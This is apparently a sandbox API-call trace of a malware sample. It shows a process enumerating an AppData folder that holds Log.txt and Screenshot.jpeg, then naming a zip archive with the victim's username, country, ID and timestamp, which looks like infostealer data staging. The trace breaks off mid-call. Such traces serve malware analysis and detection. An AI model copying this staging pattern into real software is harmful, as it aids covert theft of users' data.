0x0 [0237.705] CoTaskMemFree (pv=0x7fa3b0) [0237.705] CoTaskMemAlloc (cb=0x20c) returned 0x7fa3b0 [0237.705] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x615bf78, pwszFileMUIPath=0x7fa3b0, pcchFileMUIPath=0x615bf7c, pululEnumerator=0x615bf70 | out: pwszLanguage=0x0, pcchLanguage=0x615bf78, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x615bf7c, pululEnumerator=0x615bf70) returned 1 [0237.706] CoTaskMemFree (pv=0x0) [0237.706] CoTaskMemFree (pv=0x7fa3b0) [0237.706] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x5c80001 [0237.706] CoTaskMemAlloc (cb=0x3ec) returned 0x4b76348 [0237.706] LoadStringW (in: hInstance=0x5c80001, uID=0x10f, lpBuffer=0x4b76348, cchBufferMax=500 | out: lpBuffer="Greenwich Daylight Time") returned 0x17 [0237.706] CoTaskMemFree (pv=0x4b76348) [0237.707] FreeLibrary (hLibModule=0x5c80001) returned 1 [0237.707] RegCloseKey (hKey=0x478) returned 0x0 [0237.708] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", nBufferLength=0x105, lpBuffer=0x615bca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", lpFilePart=0x0) returned 0x2a [0237.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c13c) returned 1 [0237.708] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933"), fInfoLevelId=0x0, lpFileInformation=0x615c1b8 | out: lpFileInformation=0x615c1b8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe59c7af0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xec7931b0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xec7931b0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0237.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c138) returned 1 [0237.708] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", nBufferLength=0x105, lpBuffer=0x615bca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", lpFilePart=0x0) returned 0x2a [0237.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c13c) returned 1 [0237.708] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933"), fInfoLevelId=0x0, lpFileInformation=0x615c1b8 | out: lpFileInformation=0x615c1b8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe59c7af0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xec7931b0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xec7931b0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0237.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c138) returned 1 [0237.708] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", nBufferLength=0x105, lpBuffer=0x615bcc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", lpFilePart=0x0) returned 0x2a [0237.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c124) returned 1 [0237.708] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933"), fInfoLevelId=0x0, lpFileInformation=0x615c1a0 | out: lpFileInformation=0x615c1a0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe59c7af0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xec7931b0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xec7931b0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0237.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c120) returned 1 [0237.708] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", nBufferLength=0x105, lpBuffer=0x615bcbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", lpFilePart=0x0) returned 0x2a [0237.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c118) returned 1 [0237.709] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933"), fInfoLevelId=0x0, lpFileInformation=0x615c194 | out: lpFileInformation=0x615c194*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe59c7af0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xec7931b0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xec7931b0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0237.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c114) returned 1 [0237.709] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", nBufferLength=0x105, lpBuffer=0x615bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", lpFilePart=0x0) returned 0x2a [0237.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c144) returned 1 [0237.709] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933"), fInfoLevelId=0x0, lpFileInformation=0x615c1c0 | out: lpFileInformation=0x615c1c0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe59c7af0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xec7931b0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xec7931b0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0237.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c140) returned 1 [0237.709] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", nBufferLength=0x105, lpBuffer=0x615bce4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", lpFilePart=0x0) returned 0x2a [0237.749] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c218) returned 1 [0237.749] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", nBufferLength=0x105, lpBuffer=0x615bd20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", lpFilePart=0x0) returned 0x2a [0237.749] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\", nBufferLength=0x105, lpBuffer=0x615bcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\", lpFilePart=0x0) returned 0x2b [0237.749] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\*", lpFindFileData=0x615bf40 | out: lpFindFileData=0x615bf40*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe59c7af0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xec7931b0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xec7931b0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7dcbf8 [0237.749] FindNextFileW (in: hFindFile=0x7dcbf8, lpFindFileData=0x615bf50 | out: lpFindFileData=0x615bf50*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe59c7af0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xec7931b0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xec7931b0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.750] FindNextFileW (in: hFindFile=0x7dcbf8, lpFindFileData=0x615bf50 | out: lpFindFileData=0x615bf50*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec7931b0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xec7931b0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xec8779f0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x549, dwReserved0=0x0, dwReserved1=0x0, cFileName="Log.txt", cAlternateFileName="")) returned 1 [0237.750] FindNextFileW (in: hFindFile=0x7dcbf8, lpFindFileData=0x615bf50 | out: lpFindFileData=0x615bf50*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb8feaf0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xeb8feaf0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xeb8feaf0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0xc8c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Screenshot.jpeg", cAlternateFileName="SCREEN~1.JPE")) returned 1 [0237.750] FindNextFileW (in: hFindFile=0x7dcbf8, lpFindFileData=0x615bf50 | out: lpFindFileData=0x615bf50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0237.750] FindClose (in: hFindFile=0x7dcbf8 | out: hFindFile=0x7dcbf8) returned 1 [0237.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c1d8) returned 1 [0237.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c1e4) returned 1 [0237.755] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt", nBufferLength=0x105, lpBuffer=0x615bc90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt", lpFilePart=0x0) returned 0x32 [0237.755] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c124) returned 1 [0237.755] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\log.txt"), fInfoLevelId=0x0, lpFileInformation=0x615c1a0 | out: lpFileInformation=0x615c1a0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec7931b0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xec7931b0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xec8779f0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x549)) returned 1 [0237.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c120) returned 1 [0237.756] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt", nBufferLength=0x105, lpBuffer=0x615bc90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt", lpFilePart=0x0) returned 0x32 [0237.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c124) returned 1 [0237.756] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\log.txt"), fInfoLevelId=0x0, lpFileInformation=0x615c1a0 | out: lpFileInformation=0x615c1a0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec7931b0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xec7931b0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xec8779f0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x549)) returned 1 [0237.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c120) returned 1 [0237.756] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt", nBufferLength=0x105, lpBuffer=0x615bc90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt", lpFilePart=0x0) returned 0x32 [0237.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c124) returned 1 [0237.756] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\log.txt"), fInfoLevelId=0x0, lpFileInformation=0x615c1a0 | out: lpFileInformation=0x615c1a0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec7931b0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xec7931b0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xec8779f0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x549)) returned 1 [0237.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c120) returned 1 [0237.756] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt", nBufferLength=0x105, lpBuffer=0x615bcac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt", lpFilePart=0x0) returned 0x32 [0237.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c10c) returned 1 [0237.756] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\log.txt"), fInfoLevelId=0x0, lpFileInformation=0x615c188 | out: lpFileInformation=0x615c188*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec7931b0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xec7931b0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xec8779f0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x549)) returned 1 [0237.757] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c108) returned 1 [0237.757] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt", nBufferLength=0x105, lpBuffer=0x615bc98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt", lpFilePart=0x0) returned 0x32 [0237.757] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c12c) returned 1 [0237.757] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\log.txt"), fInfoLevelId=0x0, lpFileInformation=0x615c1a8 | out: lpFileInformation=0x615c1a8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec7931b0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xec7931b0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xec8779f0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x549)) returned 1 [0237.757] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c128) returned 1 [0237.757] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt", nBufferLength=0x105, lpBuffer=0x615bccc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt", lpFilePart=0x0) returned 0x32 [0237.778] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg", nBufferLength=0x105, lpBuffer=0x615bc90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg", lpFilePart=0x0) returned 0x3a [0237.778] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c124) returned 1 [0237.778] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\screenshot.jpeg"), fInfoLevelId=0x0, lpFileInformation=0x615c1a0 | out: lpFileInformation=0x615c1a0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb8feaf0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xeb8feaf0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xeb8feaf0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0xc8c3)) returned 1 [0237.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c120) returned 1 [0237.778] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg", nBufferLength=0x105, lpBuffer=0x615bc90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg", lpFilePart=0x0) returned 0x3a [0237.778] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c124) returned 1 [0237.778] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\screenshot.jpeg"), fInfoLevelId=0x0, lpFileInformation=0x615c1a0 | out: lpFileInformation=0x615c1a0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb8feaf0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xeb8feaf0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xeb8feaf0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0xc8c3)) returned 1 [0237.779] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c120) returned 1 [0237.779] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg", nBufferLength=0x105, lpBuffer=0x615bc90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg", lpFilePart=0x0) returned 0x3a [0237.779] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c124) returned 1 [0237.779] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\screenshot.jpeg"), fInfoLevelId=0x0, lpFileInformation=0x615c1a0 | out: lpFileInformation=0x615c1a0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb8feaf0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xeb8feaf0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xeb8feaf0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0xc8c3)) returned 1 [0237.779] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c120) returned 1 [0237.779] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg", nBufferLength=0x105, lpBuffer=0x615bcac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg", lpFilePart=0x0) returned 0x3a [0237.779] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c10c) returned 1 [0237.779] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\screenshot.jpeg"), fInfoLevelId=0x0, lpFileInformation=0x615c188 | out: lpFileInformation=0x615c188*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb8feaf0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xeb8feaf0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xeb8feaf0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0xc8c3)) returned 1 [0237.779] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c108) returned 1 [0237.779] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg", nBufferLength=0x105, lpBuffer=0x615bc98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg", lpFilePart=0x0) returned 0x3a [0237.779] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c12c) returned 1 [0237.779] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\screenshot.jpeg"), fInfoLevelId=0x0, lpFileInformation=0x615c1a8 | out: lpFileInformation=0x615c1a8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb8feaf0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xeb8feaf0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xeb8feaf0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0xc8c3)) returned 1 [0237.779] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c128) returned 1 [0237.780] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg", nBufferLength=0x105, lpBuffer=0x615bccc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg", lpFilePart=0x0) returned 0x3a [0237.780] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c218) returned 1 [0237.780] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", nBufferLength=0x105, lpBuffer=0x615bd20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", lpFilePart=0x0) returned 0x2a [0237.780] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\", nBufferLength=0x105, lpBuffer=0x615bcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\", lpFilePart=0x0) returned 0x2b [0237.780] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\*", lpFindFileData=0x615bf40 | out: lpFindFileData=0x615bf40*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe59c7af0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xec7931b0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xec7931b0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7dcbf8 [0237.780] FindNextFileW (in: hFindFile=0x7dcbf8, lpFindFileData=0x615bf50 | out: lpFindFileData=0x615bf50*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe59c7af0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xec7931b0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xec7931b0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.780] FindNextFileW (in: hFindFile=0x7dcbf8, lpFindFileData=0x615bf50 | out: lpFindFileData=0x615bf50*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec7931b0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xec7931b0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xec8779f0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x549, dwReserved0=0x0, dwReserved1=0x0, cFileName="Log.txt", cAlternateFileName="")) returned 1 [0237.781] FindNextFileW (in: hFindFile=0x7dcbf8, lpFindFileData=0x615bf50 | out: lpFindFileData=0x615bf50*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb8feaf0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xeb8feaf0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xeb8feaf0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0xc8c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Screenshot.jpeg", cAlternateFileName="SCREEN~1.JPE")) returned 1 [0237.781] FindNextFileW (in: hFindFile=0x7dcbf8, lpFindFileData=0x615bf50 | out: lpFindFileData=0x615bf50*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb8feaf0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xeb8feaf0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xeb8feaf0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0xc8c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Screenshot.jpeg", cAlternateFileName="SCREEN~1.JPE")) returned 0 [0237.781] FindClose (in: hFindFile=0x7dcbf8 | out: hFindFile=0x7dcbf8) returned 1 [0237.781] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c1d8) returned 1 [0237.781] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c1e4) returned 1 [0237.784] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\aETAdzjz_United States_A8D24E6933_08-04-2020 23.28.13.zip", nBufferLength=0x105, 